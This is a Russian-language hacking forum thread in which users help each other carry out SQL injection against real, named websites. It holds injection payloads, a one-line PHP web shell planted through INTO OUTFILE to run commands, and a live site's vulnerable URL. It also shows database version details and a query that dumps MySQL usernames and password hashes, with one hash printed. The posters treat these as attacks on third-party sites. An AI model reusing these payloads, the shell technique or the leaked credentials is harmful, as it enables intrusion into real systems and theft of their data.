прощу помочь с этим скулем: http://localhost//?script=%2527 вывод: и пробовал http://localhost//?script=%2527)+order+by+1+--+ тоже результат такой же (( Как поступит в таком случае? Думал найду в других страничках но скул единственный
http://localhost/?script=%2527)/* - так запрос должен выполниться без ошибок. http://localhost/?script=%2527) union select 1,2,3,user()/* - вот так будет sql-injection Это к примеру,т.к точного уязвимого скрипта нет.
Скидывай лог ошибки и если есть возможность изменить скрипт выводи sql запрос в браузер,так проще будет разобраться в чем причина.
спасибо M.W.N.N. и Rullery =) ну вот с привелегий FILE разобрался , ребята не можете теперь помочь как залить шелл если имееться данная привелегия и слышал что вначале лучше залить какой то "плохой" шелл а далее через него уже нормальный.Кто что посоветует по данному сабжу?
union+select+'<? system($_GET['cmd']); ?>'+into+outfile+'/[path]/shell.php' Дальше site.com/shell.php?cmd=[command]
http://www.wearhouse.ru/show_img.php?img=http://img.yandex.net/i/www/logo.png можно инклудить любую картинку, есть возможность заинклудить не картинку?
Причём тут инклуд? Просто адрес картинки подставляется в html тег или что-то типо того,что с php вообще никак не связано.
ясно, я видел что подставляется адрес картинки,просто решил уточнить.спс. ну хотя бы скули там есть )
Почему же?)) Сайт конечно не кислый с таким количеством тиц и таким возрастом домена По теме. Щас уезжаю, потому доковырять не успею. Пока успел вывести только правильный запрос. ?script=%2527/**/and/**/1=1# ну или так если с выводом.. ?script=%2527/**/and/**/1=%25271 Потом, дубли организовать пока не удалось, выбивает 'Error Column 'table_name' in field list is ambiguous in', возможно из за того что до этого стоит ещё 2 или 3 join, а возможно и фикс, что за ошибка разберусь когда прийду, потому как раньше у меня такой ещё небыло. Далее.., запятая косит запрос, потому потому это ещё усложняет дело. зы. Так как это LIKE, то обрывать нужно через #, а пробелы как вы наверное заметили я заменил на /**/ зы2. Через post всё аналогично.
спасибо , но уже перепробывал кучу вариантов ,ничего не получается,возможно что то не так делаю ... кодировку делаю... вот например сайтик с прив file [+]Printable field: 3,4,5 [+]Vuln URL: http://www.sfinc.ca/details.php?product=-3403+UNION+SELECT+1,2,3,4,5,6,7,8,9-- [+]MySQL Info: signature@localhost:4.1.22:signature:binjportbld-freebsd4.10
спасибо походу нашёл то что надо https://forum.antichat.ru/threadnav34338-1-10.html пля жаль что только читалка файлов =/
http://www.sfinc.ca/details.php?product=-3403+UNION+SELECT+1,2,file_priv,4,5,6,7,8,9+from+mysql.user-- а я думал што файл прив ето только привелегия пользователя рут... вот пасс http://www.sfinc.ca/details.php?product=-3403+UNION+SELECT+1,2,group_concat(0x3a,user,password),4,5,6,7,8,9+from+mysql.user-- signature2ab907306f36b10c,signature а также есть табличка clients
sportonline.com.ua Что за движок новостей? Пример показывания новости: sportonline.com.ua/index.php?cont=long&id=8320 (не самописный! если ввести в google -> cont=long&id= , то станет ясно что точно не самописный)
